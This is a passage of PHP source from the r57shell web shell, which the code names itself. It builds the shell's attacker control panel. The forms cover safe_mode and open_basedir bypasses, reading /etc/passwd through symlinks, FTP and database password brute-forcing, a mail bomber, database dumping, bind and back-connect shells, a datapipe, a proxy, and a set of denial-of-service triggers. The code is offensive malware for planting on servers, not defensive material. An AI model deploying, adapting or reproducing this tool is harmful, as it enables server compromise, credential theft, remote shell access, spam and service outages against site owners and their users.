7108echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',30,(!empty($_POST['dir_rlph'])?($_POST['dir_rlph']):($dir))).ws(2).'<b>'.$lang[$language.'_text55'].'</b>'.ws(2).in('text','end_rlph',6,(!empty($_POST['end_rlph'])?($_POST['end_rlph']):('.php'))).ws(2).in('hidden','cmd',0,'safe_dir').ws(2).'<b>'.$lang[$language.'_text146'].'</b>'.ws(2).$select_n_rlph.ws(2).in('hidden','realpath',0,'realpath').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7109
7110echo $te.'</div>'.$table_end1.$fe;
7111
7112}
7113
7114
7115
7116if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
7117
7118{
7119
7120echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;
7121
7122echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):($tempdir.'test.zip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7123
7124echo $te.'</div>'.$table_end1.$fe;
7125
7126}
7127
7128
7129
7130if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
7131
7132{
7133
7134echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;
7135
7136echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):($tempdir.'test.bzip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7137
7138echo $te.'</div>'.$table_end1.$fe;
7139
7140}
7141
7142
7143
7144if(($safe_mode || $open_basedir) && @function_exists('error_log') && @version_compare(@phpversion(),"5.2.2")<=0)
7145
7146{
7147
7148echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up2.div('id27').$ts;
7149
7150echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));
7151
7152echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7153
7154echo $te.'</div>'.$table_end1.$fe;
7155
7156}
7157
7158
7159
7160if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
7161
7162{
7163
7164echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;
7165
7166echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));
7167
7168echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7169
7170echo $te.'</div>'.$table_end1.$fe;
7171
7172}
7173
7174
7175
7176if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.4")<=0)
7177
7178{
7179
7180echo $fs.$table_up1.div_title($lang[$language.'_text133'],'id39').$table_up2.div('id39').$ts;
7181
7182echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test18_file2',96,(!empty($_POST['test18_file2'])?($_POST['test18_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18'));
7183
7184echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test18_file1',96,(!empty($_POST['test18_file1'])?($_POST['test18_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7185
7186echo $te.'</div>'.$table_end1.$fe;
7187
7188}
7189
7190
7191
7192if(($safe_mode || $open_basedir) && @function_exists('readfile') && @version_compare(@phpversion(),"5.2.2")<=0)
7193
7194{
7195
7196echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;
7197
7198echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));
7199
7200echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
7201
7202echo $te.'</div>'.$table_end1.$fe;
7203
7204}
7205
7206
7207
7208if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.4")<=0)
7209
7210{
7211
7212echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;
7213
7214echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
7215
7216echo $te.'</div>'.$table_end1.$fe;
7217
7218}
7219
7220
7221
7222if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
7223
7224{
7225
7226echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;
7227
7228echo "<tr><td valign=top width=70%>".$ts;
7229
7230echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
7231
7232echo $te."</td><td valign=top width=30%>".$ts;
7233
7234echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
7235
7236echo $te."</td></tr>";
7237
7238echo $te.'</div>'.$table_end1;
7239
7240}
7241
7242
7243
7244if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
7245
7246{
7247
7248echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;
7249
7250echo "<tr><td valign=top width=70%>".$ts;
7251
7252echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
7253
7254echo $te."</td><td valign=top width=30%>".$ts;
7255
7256echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
7257
7258echo $te."</td></tr>";
7259
7260echo $te.'</div>'.$table_end1;
7261
7262}
7263
7264
7265
7266
7267
7268if((!@function_exists('ini_get')) || @ini_get('file_uploads')){
7269
7270echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
7271
7272echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;
7273
7274echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,''));
7275
7276echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
7277
7278echo $te.'</div>'.$table_end1.$fe;
7279
7280}
7281
7282
7283
7284
7285
7286if((!@function_exists('ini_get')) || @ini_get('file_uploads')){
7287
7288echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
7289
7290echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;
7291
7292echo "<tr><td valign=top width=50%>".$ts;
7293
7294echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,''));
7295
7296echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,''));
7297
7298echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,''));
7299
7300echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,''));
7301
7302echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,''));
7303
7304echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,''));
7305
7306echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,''));
7307
7308echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,''));
7309
7310echo $te."</td><td valign=top width=50%>".$ts;
7311
7312echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,''));
7313
7314echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,''));
7315
7316echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,''));
7317
7318echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,''));
7319
7320echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,''));
7321
7322echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,''));
7323
7324echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,''));
7325
7326echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
7327
7328echo $te."</td></tr>";
7329
7330echo $te.'</div>'.$table_end1.$fe;
7331
7332}
7333
7334
7335
7336
7337
7338if($select_downloaders){
7339
7340 echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;
7341
7342 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",$select_downloaders.in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
7343
7344 echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir.'/download.file').ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
7345
7346 echo $te.'</div>'.$table_end1.$fe;
7347
7348}
7349
7350
7351
7352echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;
7353
7354echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
7355
7356$arh = $lang[$language.'_text92'];
7357
7358if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
7359
7360if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
7361
7362if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
7363
7364echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
7365
7366echo $te.'</div>'.$table_end1.$fe;
7367
7368
7369
7370if(@function_exists("ftp_connect")){
7371
7372echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
7373
7374
7375
7376echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>";
7377
7378echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));
7379
7380echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>");
7381
7382echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
7383
7384echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
7385
7386echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));
7387
7388echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic'))));
7389
7390echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));
7391
7392
7393
7394echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7395
7396echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
7397
7398echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
7399
7400echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
7401
7402echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
7403
7404echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
7405
7406echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
7407
7408echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
7409
7410echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
7411
7412
7413
7414echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7415
7416echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
7417
7418echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
7419
7420echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
7421
7422echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
7423
7424echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
7425
7426echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
7427
7428echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
7429
7430echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
7431
7432
7433
7434echo $te."</td>".$fe."</tr></div></table>";
7435
7436}
7437
7438
7439
7440
7441
7442if(@function_exists("mail")){
7443
7444echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
7445
7446echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
7447
7448echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
7449
7450echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
7451
7452echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
7453
7454echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
7455
7456echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
7457
7458
7459
7460echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7461
7462echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
7463
7464echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
7465
7466echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
7467
7468echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
7469
7470echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir));
7471
7472echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
7473
7474echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
7475
7476
7477
7478echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7479
7480echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>";
7481
7482echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));
7483
7484echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
7485
7486echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
7487
7488echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>');
7489
7490echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));
7491
7492echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
7493
7494
7495
7496echo $te."</td>".$fe."</tr></div></table>";
7497
7498}
7499
7500
7501
7502
7503
7504if($mysql_on||$mssql_on||$pg_on||$ora_on||$mysqli_on||$msql_on||$sqlite_on)
7505
7506{
7507
7508$select = '<select name=db>';
7509
7510if($mysql_on) $select .= '<option value=MySQL>MySQL</option>';
7511
7512if($mssql_on) $select .= '<option value=MSSQL>MSSQL</option>';
7513
7514if($pg_on) $select .= '<option value=PostgreSQL>PostgreSQL</option>';
7515
7516if($ora_on) $select .= '<option value=Oracle>Oracle</option>';
7517
7518if($mysqli_on) $select .= '<option value=MySQLi>MySQLi</option>';
7519
7520if($msql_on) $select .= '<option value=mSQL>mSQL</option>';
7521
7522if($sqlite_on) $select .= '<option value=SQLite>SQLite</option>';
7523
7524$select .= '</select>';
7525
7526
7527
7528echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up2.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
7529
7530echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>";
7531
7532
7533
7534echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));
7535
7536echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
7537
7538echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
7539
7540echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>");
7541
7542echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
7543
7544echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
7545
7546echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
7547
7548echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic'))));
7549
7550echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));
7551
7552
7553
7554echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7555
7556echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
7557
7558
7559
7560echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
7561
7562echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
7563
7564echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
7565
7566echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
7567
7568echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
7569
7570echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
7571
7572
7573
7574echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
7575
7576echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
7577
7578
7579
7580echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
7581
7582echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
7583
7584echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
7585
7586echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
7587
7588echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
7589
7590echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>";
7591
7592
7593
7594echo "</td>".$fe."</tr></div></table>";
7595
7596}
7597
7598
7599
7600
7601
7602if(!$safe_mode && $unix){
7603
7604echo $table_up1.div_title($lang[$language.'_text81'],'id37').$table_up2.div('id37').$ts."<tr>".$fs."<td valign=top width=25%>".$ts;
7605
7606echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
7607
7608echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457'));
7609
7610echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57'));
7611
7612echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
7613
7614echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
7615
7616echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
7617
7618echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
7619
7620echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
7621
7622echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
7623
7624echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
7625
7626echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
7627
7628echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
7629
7630echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
7631
7632echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457'));
7633
7634echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru'));
7635
7636echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667'));
7637
7638echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
7639
7640echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
7641
7642echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
7643
7644echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
7645
7646echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337'));
7647
7648echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
7649
7650echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
7651
7652echo $te."</td>".$fe."</tr></div></table>";
7653
7654}
7655
7656
7657
7658echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=25%>".$ts;
7659
7660echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
7661
7662echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);
7663
7664echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit [pack()]').$fe);
7665
7666echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF [unserialize()]').$fe);
7667
7668echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'BoF ZendEngine').$fe);
7669
7670echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [dl()] vuln').$fe);
7671
7672echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [preg_match()](PHP<5.2.1)').$fe);
7673
7674echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Mem_limit [str_repeat()](PHP<5.2.1)').$fe);
7675
7676echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);
7677
7678echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload [tempnam()](PHP<5.1.2)').$fe);
7679
